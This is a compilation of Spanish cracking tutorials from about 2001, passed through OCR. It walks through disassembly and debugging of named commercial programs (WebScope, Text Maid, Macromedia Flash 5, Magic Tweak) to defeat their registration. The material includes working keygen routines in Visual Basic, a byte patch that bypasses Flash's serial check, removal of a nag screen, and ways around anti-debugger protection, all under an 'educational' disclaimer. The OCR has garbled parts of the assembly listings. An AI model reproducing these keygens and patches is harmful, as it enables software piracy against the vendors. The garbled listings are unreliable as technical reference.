Bueno así damos por terminado nuestro traceo, teniendo nuestro serial en la mano podemos generar nuestro keygen o 
podemos registrar nuestro programa y eso es todo, nuestro serial debemos ingresarlo en el programa en valor 
HEXadecimal. 


Nuestra rutina principal del keygen quedaría así... 


Private Sub Genera(MiNombre As String) 
MiTexto = "Coloqueaquilapalabraclave" 
For I1= 1 To Len(MiTexto) 

EAX = Asc(Mid(MiTexto, I, 1)) 
AX =EAX 
For II = 1 To 5 
EAX = EAX * 2 
Next 
EBX = EBX + EAX 
EBX = EBX + AX 
Next 
For 1= 1 To Len(MiNombre) 
EAX = Asc(Mid(MiNombre, L, 1)) 
ECX = ECX + (EBX * EAX) 
Next 
Text2.Text = LCase(Hex(ECX)) <= Ej el serial correcto debe estar en letras minúsculas 
End Sub 


$2 Text Maid v1.4 E 42 My Scribe v1.5 E xj 
Nombre: [ByTESCRKGiespana.es Nombre: [ByTESCRK 
Código: [2cc?780 Código: [12e67f 


Generar | 


Una vez hayamos generado este podemos, cambiar tambien la palabra clave del programa My Scribe v1.5 de este 
mismo autor y tendremos un serial para registrarnos, pero eso ya les queda a ustedes. Y como siempre... 


"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas de manera 
educacional y tambien como diversión, si ha USTED, le gusta el producto por favor COMPRELO, algunas 
veces... los autores merecen su dinero ;0)" 


Saludos a mis buenos amigos Karpoff, PrOfesor_X, CaoS ReptantE (¡Gracias por tus consejos!) y a todos los crackers 
hispanohablantes, en especial a ti por que has llegado hasta aquí. 


Si tienes alguna duda o comentario escríbeme a: ByTESCRK QGiespana.es 
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ByTESCRK FECHA: 12/10/2001 


INTRODUCCION 


Creo que esto (séptimo tutorial) no hubiese sido posible, sino es por el ánimo que en su oportunidad me diera 
mi buen amigo CaoS ReptantE. 


Este es un programa que me traía pensando desde hace mucho tiempo, CaoS me dijo "el número o el 
algoritmo para calcularlo debe estar necesariamente en el programa", esto debido a que me imaginaba que era 
algo externo del programa. Y por decirlo así ya verán a lo que me refiero. 


Cuando desensamblemos el programa en W32DASM podemos ver en las Reference Strings la cadena 
MASICE esto nos indica que si tenemos el Softlce instalado, el programa no se ejecutará, pero podemos hacer 
uso del FrogSice, para que el programa si se ejecute, puesto que tambien tiene una rutina de CRC-Protection, 
lo que quiere decir que si parchamos el programa salta esta rutina, tambien encontraremos la referencia a otro 
programa MAÁNTICE (aún no lo conozco). 


AL ATAKE 


Empecemos, carguemos el programa aparece una ventanita para registrarnos, hacemos clic en Registrar y aparecen 
nuestros viejos amigos, las cajitas de Nombre de Usuario y de Serial ingresamos nuestros valores 


Nombre de Usuario: ByTESCRK 
Serial: 19970424 


Y nos da el mensajito de error... 


"El nombre de usuario o la clave introducida no son válidos. 
Verifica que los datos que introduces están correctamente 
escritos, tal y como aparecen en la información de registro." 


Cerramos el programa y vamos a desensamblar con W32DASM y buscamos esta cadena en las Reference Strings, al 
hallarla vemos lo siguiente 


:005424EE E9F513ECFF ¡mp 004038E8 
:005424F3 EBES ¡mp 005424DD 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:00542450(C) <= Vamos a investigar aqui 


:005424FE5 6A30 push 00000030 


* Possible StringData Ref from Code Obj ->"Error" 


:005424F7 B9C4255400 mov ecx, 005425C4 


* Possible StringData Ref from Code Obj ->"El nombre de usuario o la clave " 
->"introducida no son v" 


:005424FC BACC255400 mov edx, 005425CC <= Caemos aqui 
:00542501 A1E0385900 mov eax, dword ptr [005938E0] 
:00542506 8B00 mov eax, dword ptr [eax] 

:00542508 E8C73FF1FF call 004564D4 


Ahora cargamos el programa TRW2000 y cargamos el programa con LOAD, ponemos un punto de ruptura en 
00542449 (bpx 00542449), Ctrl + N para continuar con la ejecución del programa, nos aparece nuevamente la 
ventanita y volvemos a ingresar nuestros valores y hacemos clic en OK automáticamente salta TRW y caemos en... 


:00542445 8B45F8 mov eax, dword ptr [ebp-08] 

:00542448 59 pop ecx 

:00542449 ESFEF7FFFF call 00541C4C <= Vamos a entrar aqui 
:0054244E 84CO0 test al, al 

:00542450 0F849F000000 je 005424F5 


* Possible StringData Ref from Code Obj ->"SoftwarelSaroviWebScope" 


:00542456 B984255400 mov ecx, 00542584 

:0054245B B201 mov dl, 01 

:0054245D A1DC824500 mov eax, dword ptr [004582DC] 
:00542462 ESE969F1FF call 00458E50 


Al entrar en la llamada encontramos esto... 


:00541C4C 55 push ebp 

:00541C4D 8BEC mov ebp, esp 
:00541C4F 83C4F4 add esp, FFFFFEF4 
:00541C52 53 push ebx 


:00541C53 56 push esi 

:00541C54 33DB xor ebx, ebx 

:00541C56 895DF4 mov dword ptr [ebp-0C], ebx 

:00541C59 894DF8 mov dword ptr [ebp-08], ecx 

:00541C5C 8955FC mov dword ptr [ebp-04], edx 

:00541C5F 8BF0 mov esi, eax 

:00541C61 8B45FC mov eax, dword ptr [ebp-04] 

:00541C64 ES9F26ECFF call 00404308 

:00541C69 8B45F8 mov eax, dword ptr [ebp-08] 

:00541C6C Es9726ECFF call 00404308 

:00541C71 33C0 xor eax, eax 

:00541C73 55 push ebp 

:00541C74 68751D5400 push 00541D75 

:00541C79 64FF30 push dword ptr fs:[eax] 

:00541C7C 648920 mov dword ptr fs:[eax], esp 

:00541C7F 33DB xor ebx, ebx 

:00541C81 8B45FC mov eax, dword ptr [ebp-04] 

:00541C84 ESCB24ECFF call 00404154 <= Cuenta los caracteres del serial 

:00541C89 83F80D cmp eax, 0000000D <= Compara que nuestro serial sea mayor que 13 letras 
:00541C8C 0F8CC8000000 j1 00541D5A <= Si es menor busca la salida y da chicomalo 
:00541C92 8D4608 lea eax, dword ptr [esi+08] 

:00541C95 50 push eax 

:00541C96 B904000000 mov ecx, 00000004 

:00541C9B BA01000000 mov edx, 00000001 

:00541CA0 8B45FC mov eax, dword ptr [ebp-04] 

:00541CA3 E8B426ECFF call 0040435C 

:00541CA8 8D460C lea eax, dword ptr [esi+0C] 

:00541CAB 50 push eax 

:00541CAC B902000000 mov ecx, 00000002 

:00541CB1 BA05000000 mov edx, 00000005 

:00541CB6 8B45FC mov eax, dword ptr [ebp-04] 

:00541CB9 Es9E26ECFF call 0040435C 

:00541CBE 8B45FC mov eax, dword ptr [ebp-04] 

:00541CC1 8A4006 mov al, byte ptr [eax+06] <= Extrae el séptimo caracter 

:00541CC4 25FF000000 and eax, OOOOOOFF 

:00541CC9 83C0CF add eax, FFFFFFCF <= Suma EAX = EAX - 31h 

:00541CCC 83F806 cmp eax, 00000006 <= Compara que el valor esté entre 1 y 6 
:00541CCF 0F8785000000 ja 00541D5A  <=Si el valor resultante no esta entre 1 y 6 sale 
:00541CD5 FF2485DC1C5400 jmp dword ptr [4*eax+00541CDC] <= Va dependiendo del valor 


:00541CF8 C6461000 mov [esi+10], 00. <= Si es cero llega aqui 
:00541CFC EB22 jmp 00541D20 <= Vamos a 00541D20 
:00541CFE C6461001 mov [esi+10], 01  <=Si es uno llega aqui 
:00541D02 EB1C ¡mp 00541D20 

:00541D04 C6461002 mov [esi+10], 02 <= etc. 

:00541D08 EB16 ¡mp 00541D20 

:00541DOA C6461003 mov [esi+10], 03 

:00541DO0E EB10 jmp 00541D20 

:00541D10 C6461004 mov [esi+10], 04 

:00541D14 EBOA ¡mp 00541D20 

:00541D16 C6461005 mov [esi+10], 05 

:00541D1A EB04 ¡mp 00541D20 

:00541D1C C6461006 mov [esi+10], 06 


:00541D20 8D4614 lea eax, dword ptr [esi+14] <= Aqui caemos 
:00541D23 50 push eax 

:00541D24 B905000000 mov ecx, 00000005 

:00541D29 BA08000000 mov edx, 00000008 

:00541D2E 8B45FC mov eax, dword ptr [ebp-04] 


:00541D31 E82626ECFF call 0040435C 

:00541D36 8D4618 lea eax, dword ptr [esi+18] 

:00541D39 8B55F8 mov edx, dword ptr [ebp-08] 

:00541D3C E8E721ECFF call 00403F28 

:00541D41 8D55F4 lea edx, dword ptr [ebp-0C] 

:00541D44 8BC6 mov eax, esi 

:00541D46 E825FEFFFF call 00541B70 <= Calcula el serial, nosotros entramos 
:00541D4B 8B55F4 mov edx, dword ptr [ebp-0C] <= Serial del programa 
:00541D4E 8B45FC mov eax, dword ptr [ebp-04] <= Serial malo 
:00541D51 ES0E25ECFF call 00404264 <= Compara el serial 
:00541D56 7502 ¡ne 00O541D5A  <=Si no son iguales sale y error! 
:00541D58 B301 mov bl, 01 

:00541D5A 33C0 xor eax, eax 

:00541D5C SA pop edx 

:00541D5D 59 pop ecx 

:00541D5E 59 pop ecx 

:00541D5F 648910 mov dword ptr fs:[eax], edx 

:00541D62 687C1D5400 push 00541D7C 

:00541D67 8D45F4 lea eax, dword ptr [ebp-0C] 

:00541D6A BA03000000 mov edx, 00000003 

:00541D6F E88421ECFF call 00403EF8 

:00541D74 C3 ret 


Adentro de la rutina vemos esto... 


:00541B70 55 push ebp 

:00541B71 8BEC mov ebp, esp 

:00541B73 83C4C8 add esp, FFFFFFCS8 

:00541B76 53 push ebx 

:00541B77 56 push esi 

:00541B78 33C9 xor ecx, ecx 

:00541B7A 894DC8 mov dword ptr [ebp-38], ecx 

:00541B7D 8955FC mov dword ptr [ebp-04], edx 

:00541B80 8BD8 mov ebx, eax 

:00541B82 33C0 xor eax, eax 

:00541B84 55 push ebp 

:00541B85 68241C5400 push 00541C24 

:00541B8A 64FF30 push dword ptr fs:[eax] 

:00541B8D 648920 mov dword ptr fs:[eax], esp 

:00541B90 BE01000000 mov esi, 00000001 <=ESTI recibe el valor de 1 
:00541B95 8B4318 mov eax, dword ptr [ebx+18] <= Nuestro nombre 
:00541B98 ESB725ECFF call 00404154 <= Cuenta las letras 
:00541B9D 83F801 cmp eax, 00000001 <= Compara con 1 
:00541BA0 7COF jl 00541BB1  <=8Si es blanco da error 

:00541BA2 8B5318 mov edx, dword ptr [ebx+18] <= Nuestro nombre 
:00541BA5 0FB65402FF movzx edx, byte ptr [edx+eax-01] <= Extrae letra por letra 
:00541BAA 03F2 add esi, edx <= ESI = ESI + EDX (EST trae 1 la primera vez) 
:00541BAC 48 dec eax <= Decrece EAX en 1 

:00541BAD 85CO0 test eax, eax <= Compara 

:00541BAF 75Fl1 jne 00541BA2  <=Si no ha terminado regresa 
:00541BB1 8B45FC mov eax, dword ptr [ebp-04] 

:00541BB4 50 push eax 

:00541BB5 8B4308 mov eax, dword ptr [ebx+08] 

:00541BB8 8945CC mov dword ptr [ebp-34], eax 

:00541BBB C645D00B mov [ebp-30], 0B 

:00541BBF 8B430C mov eax, dword ptr [ebx+0C] 

:00541BC2 8945D4 mov dword ptr [ebp-2C], eax 

:00541BC5 C645D80B mov [ebp-28], 0B 

:00541BC9 8BC3 mov eax, ebx 


:00541BCB ES6CFEFFFEF call 00541A3C 
:00541BD0 8845DC mov byte ptr [ebp-24], al 
:00541BD3 C645E002 mov [ebp-20], 02 
:00541BD7 8B4314 mov eax, dword ptr [ebx+14] 
:00541BDA 8945E4 mov dword ptr [ebp-1C], eax 
:00541BDD C645E80B mov [ebp-18], 0B 
:00541BE1 8975EC mov dword ptr [ebp-14], esi 
:00541BE4 C645F000 mov [ebp-10], 00 
:00541BE8 8D55C8 lea edx, dword ptr [ebp-38] 
:00541BEB 8BC3 mov eax, ebx 

:00541BED ES8EFEFFFF call 00541480 <= Entramos aqui 


Investigamos en la llamada, dentro de la rutina encontramos lo siguiente... 


:00541A80 55 push ebp 

:00541A81 8BEC mov ebp, esp 

:00541A83 83C4D0 add esp, FFFFFFDO 

:00541A86 53 push ebx 

:00541A87 56 push esi 

:00541A88 33C09 xor ecx, ecx 

:00541A8A 894DF8 mov dword ptr [ebp-08], ecx 

:00541A8D 8955FC mov dword ptr [ebp-04], edx 

:00541A90 8BF0 mov esi, eax 

:00541A92 33C0 xor eax, eax 

:00541A94 55 push ebp 

:00541A95 684F1B5400 push 00541B4F 

:00541A9A 64FF30 push dword ptr fs:[eax] 

:00541A9D 648920 mov dword ptr fs:[eax], esp 

:00541AA0 BB01000000 mov ebx, 00000001 <= EBX recibe el valor de 1 
:00541A AS 8B4618 mov eax, dword ptr [esi+18] <= Nuestro nombre 
:00541AA8 EsA726ECFF call 00404154 <= Calcula las letras 
:00541AAD 83F801 cmp eax, 00000001 <= Compara con 1 

:00541AB0 7COF j100541AC1  <=Si es en blanco da error 

:00541AB2 8B5618 mov edx, dword ptr [esi+18] <= Nuestro nombre 
:00541AB5 0FB65402FF movzx edx, byte ptr [edx+eax-01] <= Extrae letra por letra 
:00541ABA 03DA add ebx, edx <= Suma EBX = EBX + EDX (EBX trae 1 en la primera letra) 
:00541ABC 48 dec eax 

:00541ABD 85CO0 test eax, eax 

:00541ABF 75Fl jne 00541AB2  <=Si no ha completado el nombre regresa 
:00541AC1 8D45F8 lea eax, dword ptr [ebp-08] <= Vemos que EBX = 648d 
:00541AC4 50 push eax 

:00541AC5 8B4608 mov eax, dword ptr [esi+08] 

:00541AC8 8945D0 mov dword ptr [ebp-30], eax 

:00541ACB C645D40B mov [ebp-2C], OB 

:00541ACF 8B460C mov eax, dword ptr [esi+0C] 

:00541AD2 8945D8 mov dword ptr [ebp-28], eax 

:00541AD5 C645DCOB mov [ebp-24], 0B 

:00541AD9 8BC6 mov eax, esi 

:00541ADB ES5CFFFFFF call 00541A3C 

:00541AE0 8845E0 mov byte ptr [ebp-20], al 

:00541AE3 C645E402 mov [ebp-1C], 02 

:00541AE7 8B4614 mov eax, dword ptr [esi+14] 

:00541AEA 8945E8 mov dword ptr [ebp-18], eax 

:00541 AED C645ECOB mov [ebp-14], OB 

:00541AF1 895DF0 mov dword ptr [ebp-10], ebx 

:00541 AF4 C645F400 mov [ebp-0C], 00 

:00541AF8 8D55DO0 lea edx, dword ptr [ebp-30] 

:00541 AFB B904000000 mov ecx, 00000004 

:00541B00 B8641B5400 mov eax, 00541B64 


:00541B05 EsD28FECFF call 0O4DAADC 

:00541BOA BB01000000 mov ebx, 00000001 <= EBX recibe 1 

:00541B0F 8B45F8 mov eax, dword ptr [ebp-08] <= Vemos la concatenación 197704241977648 
:00541B 12 E83D26ECFF call 00404154 <= Cuenta la concatenación 

:00541B 17 83F801 cmp eax, 00000001 <= Compara con 1 

:00541B1A 7C0F jl 00541B2B  <=Si es vacio sale 

:00541B1C 8B55F8 mov edx, dword ptr [ebp-08] <= La concatenación 

:00541B1F 0FB65402FF movzx edx, byte ptr [edx+eax-01] <= Extrae caracter por caracter 
:00541B24 03DA add ebx, edx <= Suma EBX = EBX + EDX (EBX trae 1 la primera vez) 
:00541B26 48 dec eax 

:00541B27 85CO0 test eax, eax 

:00541B29 75F1 jne 00541B1C <= Hasta terminar, recibiremos 797d 

:00541B2B 8B55FC mov edx, dword ptr [ebp-04] <= EDX = 5698d 

:00541B2E 0FB74604 movzx eax, word ptr [esi+04] <= EAX = 5698d o 1642h 

:00541B32 03C3 add eax, ebx <= Suma EBX + EAX (5698+795=6495) 

:00541B34 Es7780ECFF call 00409BB0 

:00541B39 33C0 xor eax, eax 

:00541B3B 5A pop edx 

:00541B3C 59 pop ecx 

:00541B3D 59 pop ecx 

:00541B3E 648910 mov dword ptr fs:[eax], edx 

:00541B41 68561B5400 push 00541B56 

:00541B46 8D45F8 lea eax, dword ptr [ebp-08] 

:00541B49 Es8623ECFF call 00403ED4 

:00541B4E C3 ret 


Salimos de la rutina y volvemos a... 


:00541BF2 8B45C8 mov eax, dword ptr [ebp-38] <= Recibe el valor 6495 
:00541BF5 8945F4 mov dword ptr [ebp-0C], eax 

:00541BF8 C645F80B mov [ebp-08], OB 

:00541BFC 8D55CC lea edx, dword ptr [ebp-34] 

:00541BFF B905000000 mov ecx, 00000005 

:00541C04 B83C1C5400 mov eax, 00541C3C 

:00541C09 ESCESEECFF call O0O40AADC <= Concatena los valores 1977042419776486495 
:00541C0E 33C0 xor eax, eax 

:00541C10 SA pop edx 

:00541C11 59 pop ecx 

:00541C12 59 pop ecx 

:00541C13 648910 mov dword ptr fs:[eax], edx 

:00541C16 682B 105400 push 00541C2B 

:00541C1B 8D45C8 lea eax, dword ptr [ebp-38] 

:00541C1E E8B122ECFF call 00403ED4 

:00541C23 C3 ret 


Ahora que ya tenemos nuestro serial salimos de TRW2000 y vamos a iniciar el programa normalmente, nos aparece la 
nagscreen y damos clic en registrar escribimos nuestro nombre y serial y clic en continuar, PRESTO!, ha pasado sin 
dar el mensaje de chicomalo, reiniciemos el programa tan solo para cerciorarnos. 


Vaya! Vaya! Lo que me temía, hay algo que no anda bien, hemos recibido el siguiente mensajito... 
¡Código y nombre de usuario no autorizados! blah, blah, blah, etc. 

Hasta dice que soy un caradura... ;0) 

Qué especie de carajo tiene este programa, vamos a investigar en las Reference Strings... 


No encontramos nada, tan solo lo mismo, que ya hemos visto, que podemos hacer, vamos a rastraer desde el principio, 
pero para eso utilizaremos OllyDBG. 


Cargamos el Olly y cargamos el programa en el Olly, vamos al punto de entrada y empezamos a tracear con F8, vemos 
que extrae nuestros datos del registro de Windows, 


HKCUWSofwarelSaroviWebScope 
Usuario 
Registro 


Desde la dirección 0OS8FEC8 nuestro nombre que viene en minúsculas va a ser comparado con otros nombres 
prohibidos como 


asrael, agustin mollo, marcos oliver hengstebek y má4nson 
y el código nuestro con los códigos 


11111111111119716448, XXXXXX31003412796624 
XXXXXX31005924266626, XXXX786123454806591 
(Las X's es la palabra clave) 


Me imagino que cada uno corresponde a los nombres de arriba, pero continuamos y en 0058FF98 se extrae los 
primeros 6 caracteres de nuestro código 199704 y encontramos un nuevo conjunto de caracteres, con los que se 
comparan los nuestros en 0OS8FFAD, como no son iguales nos da el mensaje de ChicoMalo. 


Bueno cargamos el regedit y buscamos en él y vamos a cambiar 197704 por el conjunto de caracteres buenos. 


Tambien recordemos que en 00541B1C se realizó un calculo para nuestro serial fuera aceptado por el programa, 
debemos de calcularlo de nuevo, pues hemos cambiado los primeros seis caracteres, sino siempre recibiremos el 
mensaje de error 


RECAPITULANDO 


1. Palabra clave (6 Caracteres) 

2. Serial de catorce caracteres (no se que pasa si tiene 13) 

3. Calcular para el nombre (Decimal de Letra por letra) + 1 

4. Unir los primeros 12 caracteres + el calculo del punto 3 

5. Calcular para el serial (Decimal de cada caracter por caracter) + 1 
6. Unir el punto 4 con el punto 5 para el serial correcto 


Al final debe ser así XXXXXX??????AAAANNNN <= El tamaño puede variar (19 o 20) 


AAAA = Primer resultado 
NNNN = Segundo resultado 


LA RUTINA DE GENERACION DEL SERIAL 


Private Sub Genera() 

MyCode = "PalabraClave" 

For I=1 To 6 
A = GetRandomNumber(1l, 6) 
B=B + Trim(Str(A)) 

Next 

MyCode = MyCode + B 

For I= 1 To Len(Trim(Textl .Text)) 
EAX = Asc(Mid(Textl.Text, IL, 1)) 
EBX = EBX + EAX 


Next 
ECX = MyCode + Trim(Str(EBX + 1)) 
EBX= 1 


For I= 1 To Len(Trim(ECX)) 
EAX = Asc(Mid(ECX, L 1)) 


EBX = EBX + EAX 
Next 
Text2.Text = ECX + Trim(Str(EBX + 5698)) 
End Sub 


Public Function GetRandomNumber(Lower As Integer, Upper As Integer) As Integer 
Randomize 
GetRandomNumber = Int((Upper - Lower + 1) * Rnd + Lower) 

End Function 


d WebScope v3.8a 0 xj 
Nombre: [ByTESCRK 


Código: |????7772419776486594 


Generar | 


"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas de manera 
educacional y tambien como diversión, si ha USTED, le gusta el producto por favor COMPRELO, algunas 
veces... los autores merecen su dinero ;0)" 


Saludos a mis buenos amigos Karpoff, PrOfesor_X, CaoS ReptantE y a todos los crackers hispanohablantes, en 
especial a ti por que has llegado hasta aquí. 


Si tienes alguna duda o comentario escríbeme a: ByTESCRK QGiespana.es 


ByTESCRK 


Nota: Sería bueno que me dijeras en qué momento salí del programa con mensaje de error. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2002 
Programa" Macromedia Flash V 5.0 


PROTECCIÓN: Nag Screen y... 
Descripción: [Programa para presentaciones en Flash, ... 
Dificultad: Facililla (Depende de tu nivel) 


DOWNLOAD: Morpheus o Kaaza 


File Inspector, Hex Workshop, Offset Calculator v 
1.0, Softice, W32dsm89 


CRACKER: WSEXM 


Herramientas: 


| FECHA: 17/11/2001 


INTRODUCCION 


Considero este programa como el mejor dentro de su gama y de aquellos 
rogramas que realizan algo parecido: Presentaciones en Flash (con sonido y muchas 
chorradas de esas). 

¿Por qué he elegido este soft? Pues, por que intentaba aprender la protección de 
anteriores versiones, para un programa que tengo que no hay por donde meterle 
mano, y creía que ésta la tendría también. Me equivoqué. 

El presente tutorial trata de mostrar la verdadera casualidad, no causalidad, que 
desde mi parte, es el mundo del crack. Considero que hasta que no haya una forma 
casi universal de realizar nuestra tarea no podremos denominar a la Crackeología 
como ciencia. Pero soy el menos indicado para hablar de este tema. 

Para quien empiece, lea los tutoriales que se recogen en la página de Karpoff. 
Para quien sepa más que yo, Todos, propongan otras formas de patear esta mierda. 

Antes de empezar decir que tu debes ir antes que yo, me explico, tu debes darle al 
coco para que puedas trazar las posibles ideas que se presentan a lo largo del tutorial 
o aquellas que creas y no se presenten. 


| AL ATAKE 
Loadina. is 0 


Tras realizar los pasos previos, por si no has caído debes 
instalar el programa y ejecutarlo. Aparece una pantallita con 
cinco huecos, uno para cada epígrafe: First/ Initial/ Last 
Name; Organization; Serial Number. Rellena estos recuadros 
como quieras, verás que te aparece un mensaje: “Required 


rr 


Information...”, y no podemos hacer nnaa!! 


Primera posibilidad: 

Pasarle el Filelnspector y observamos que no está 
comprimido con Aspack, Armadillo, etc; 

Nos adentramos en las profundidades de las tumbas con el 
W32dsm89, para comprobar la alerta anterior, te acuerdas, ¿no? 
La hubieras apuntado. En caso afirmativo, veo que estás 
atento. Pulsamos el “string data references”: ¡qué montón! 
Paciencia y sigue buscando: String Resource ID=006309: 
"Required Information. This Macromedia product Cannot run 
wit”, Crees que es ésta. Prueba para ver si te sirve algo. 
Aunque me fijé, me parecía que no podía obtener gran cosa. Fin 
de la primera parte: tocado. 


Segunda Posibilidad: 

Tienes el Softice preparado, ¡ataca! Si se pone el 
infalible hmemcpy se realiza una rutina un poco más larga. 
Perdona si este paso lo has hecho y ¿cuál debes colocar para 
que salga más cortito?, Jejeje. Enhorabuena, has conseguido 
ver que se activaba el Getwindowtexta Por eso, vamos a poner 
éste como nuestro break. No te voy a poner gifs donde 
aparecemos ni donde acabamos por que Karpoff aconseja a sus 
pupilos ahorrar en gilipolleces. Tampoco debes preocuparte por 
eso pues estos pasos los vas a realizar solo o sola para 
comprobar ciertas cosas: 

1* Debes encontrar, una vez dentro del código (cuando te 
aparece el nombre del programa en una línea verde) el número 
de serie falso: FLW500-xxXXXXXXXX 
2% Además, debe aparecer por ahí cerca los datos que has 
introducido en los otros huecos: d eax, d esi... (para ello 
puedes tracear con f10 o darle f12) 
3? Ten paciencia y no te pierdas con el Softice, pues vamos 
por el buen camino. Si se te ha olvidado algo hazlo, como 
quitar el break en ejecución, BC*. 

He de reconocer que me perdí, porque veía el número de 
serie falso y buscaba el verdadero en la ventana de datos, 


pero cuando parecía estar cerca, me echaba a la Calle, algunas 
veces volvía a entrar automáticamente o pulsaba aceptar y 
estamos dentro del depurador Esto me mosqueaba, no sabía 
porque me echaba. Si no te echa o tarda mucho, lo más seguro, 
será que tiene todavía puesto el bpx getwindowtexta y hace 
como el Repeat (de un reproductor CD)que vuelve la canción al 
principio, llevarnos al principio de esta rutina. 

Busca el número de serie que no lo encontrarás, por lo 
menos de esta forma no. Pero sigue traceando hasta que te eche 
del todo fijándote bien en las direcciones y en lo que te 
pueda interesar a la vez que entiendes el código: tocado y 
Run. 


Tercera Posibilidad: 

Esta enlaza con el final de la anterior. Si has realizado 
lo que he dicho, aparte de marearte y de pasar el tiempo, 
habrás conseguido dos cosas: La Puerta de Entrada y la forma 
de cómo atacarla. Llegué por casualidad, más bien porque era 
la última pantalla antes de echarte (sitúate aquí)), pero me 
llamó la atención la forma en la que aparecía, daba buen 
rollo. Si has leído otros buenos tutoriales (todos son buenos) 
considera lo allí aprendido para aplicarlo en este. ¿No has 
visto esto antes, algo así como Mov, Call, Test, Jnz? Verdad, 
así realiza los cambios oportunos de manera temporal en el 
softice. (¿Qué cambios? No me sigues; lee otros manuales donde 
aparezca esta rutina). Lo que no he visto, y he leído 
tutoriales desde 2000, ¿qué es esto que intentamos?: abrir la 
puerta cuando se cierra todo (si alguien me puede explicar el 
por qué de esto, mandadme un e-mail). 

Realizado los cambios de manera temporal, salimos del 
softice (Ctrl-d), sorpresa: estamos dentro. 

A la tercera va la vencida. Realicemos los cambios 
permanentes a través de nuestro editor hexa: lo abrimos y 
buscamos la dirección en hexadecimal, pero cuál era ¿???; 
manda gúevos, debemos calcularla a través del Offset 
Calculator v1.0 metiendo nuestro address donde creamos que 
está la chispa. El programa tiene un funcionamiento sencillo: 
un “File”, donde abres el programa; un hueco cerca donde 
ponemos la dirección en la que hacemos los Cambios. Ves un 
botón Calculate, pues dale si has metido la dirección, y coge 
la dirección en hexadecimal sin la h (final). Si te da error 
es porque tienes abierto este programa con el Hexa, por tanto 
evita tener un mismo programa abierto con dos herramientas a 
la vez. Volvemos al Editor hexa, abrimos el programa vamos a 
Go to (Edit) y colocamos el número comentado del Offset. 
Aparecemos delante de un número que pasaremos a cambiar (75 a 


74) y guardamos estos cambios. Volvemos a abrir el Flash 5.0 
Y... Mierda, no ha pasado nada. La pantallita de registro otra 
vez. Que hemos hecho mal. Respira hondo y Zen cracking. 
Volvemos al Editor Hexa y comprobamos el cambio (introducimos 
el número hexa,...) no ha pasado nada sigue el mismo número 
original. Probamos varias veces a realizar los cambios y... 
Nada, está jodido. Pero el Zen ha dado su fruto ya que hay una 
voz interior que dice “guarda el exe con otro nombre.exe tras 
realizar los cambios”. Así haces (si has guardado el archivo, 
en el primer cambio, con otro nombre, eres cojonudo). Abrimos 
el programa que guardamos con el nombre cambiado y... Otra vez 
la puta pantalla, pero ¿qué ha pasado?: al darle a Cancel 
entramos en el programa totalmente funcional. 

Pensamos: al abrir el programa sale una pantalla,..., es 
una Nags Screen. Adelante quitémosla. No voy a explicar algo 
que puedas leer de otra persona. Así que lee algún tutorial 
del Profesor X en el que venga como eliminar las nags (uséase 
AstroWorld 2000 v 4.1.0.1 (Spanish Edition)). Después de 
eliminar la nags deberás guardarlo otra vez con otro nombre. 
NO SE POR QUÉ. 

Si intentas quitar la Nags Screen en primer lugar vas a 
encontrarte con que el programa parecerá un flash (de estos de 


súper disco fashion). 
| 


| 
Podemos decir realizadas todas las tareas y ratón en mano: Tu 
she 


Si busca el número en Internet y lo instalas verás que no 
hay cambios, exceptuando que se registra formalmente. Pero si 
has leído hasta aquí y decides hacer eso, de forma permanente 
eres un... Ten en Cuenta que si introduces el número de serie 
correcto, no podrás acceder al que tu has guardado. Así decir 
también que existen alguna pequeña diferencia entre la 
configuración real (tras introducir el número correcto) y 
entrar por la puerta trasera, pero que debes subsanar leyendo 
tutoriales para aprender a utilizar Macromedia Flash. Si 
quieres ver tus datos en el registro dirígete a 
HKEY_LOCAL_MACHINEXSOFTWAREXMACROMEDIAXFLASHI5NREGISTRATION 


| 
| 


Conclusión 

Hemos crackado un programa por casualidad, o al menos eso 
creo en la primera parte. Si has realizado los cambios antes 
que yo de forma satisfactoria, enhorabuena. Si te has perdido 
léelo despacio o mándame un e-mail realizando una crítica, 
diciéndome otra forma (serial verdadero), o lo que quieras. 
wsexmémixmail.com 


Gracias 

A estas páginas de donde aprendemos, a esa gente que sabe 
más y a esa otra que sabe no menos, para que se siga 
aumentando los conocimientos y aprendamos de todos con todos y 
de todas las formas. Gracias. 


El autfr no es responsable del mal uso que se pueda 


realizar de este texto. Solo la finalidad educativa está 
permitida y admitida sin saltarse las leyes de tu gobierno. 
Cómpralo si vas a trabajar con él o si lo utilizas, darás de 
comer a una persona. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgación de información en 
Castellano, sobre Ingeniería Inversa y Programación. Email "Colabora con tus 


Proyectos" 


Karpoff Spanish Tutor 1999-2002 


Programa: Magic Tweak vl1.60 

PROTECCION: Name / Serial 

Objetivo: Obtener un serial válido 

Descripcion: MagicTweak hace fácil el configurar millones de cosas en Windows y no necesita hacer 
modificaciones al registro manualmente. 

Dificultad: Media 

DOWNLOAD : http: //www.magictweak.com 

Herramientas: TRW2000, W32dasm 

CRACKER: ByTESCRK FECHA: 13/12/2001 


INTRODUCCION 


Bueno, después de algunos días que me he hecho un tanto el desentendido en esto he regresado a 
crackear este programa y la verdad es que he estado viendo algunos otros de los cuales ya haré un 
tuto, mientras que aquí les cocino este otro. 


Este programa es muy práctico, puede sacarlo a uno de apuros realmente, más sin embargo, cómo 
siempre lo he dicho las protecciones algunas veces no son apropiadas para ciertos programas, la 
verdad es que me parece un tanto inconcebible el precio de esta utilería que aparte de ocupar 
espacio en tu disco no es más ni menos una utilería, que bien, pasemos ahora a lo nuestro... 


AL ATAKE 


Cómo siempre cargamos el programa y nos vamos al punto de registrar que tiene y vemos que en la pantalla 
de About nos aparece un botón Enter Code lo presionamos y luego nos aparece una ventanita con el espacio 
para ingresar nuestro nombre y serial, al ingresarlos nos dice 


"Thanks for your registering.Please restart the program to verify the registration code." 


Clásico truco en algunos programas hoy en día, vamos a desensamblar en W32DASM y buscamos la cadena, 
cuando la hallemos haremos doble clic sobre ella y caeremos por esta parte de código 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:00423DE3(C) <= Rondamos por aqui... 


| 
:00423DFD 8B86F4050000 mov eax, dword ptr [esi+000005F4] 
:00423E03 57 push edi 


* Reference To: USER32.wsprintfA, Ord: 02ACh 


| 

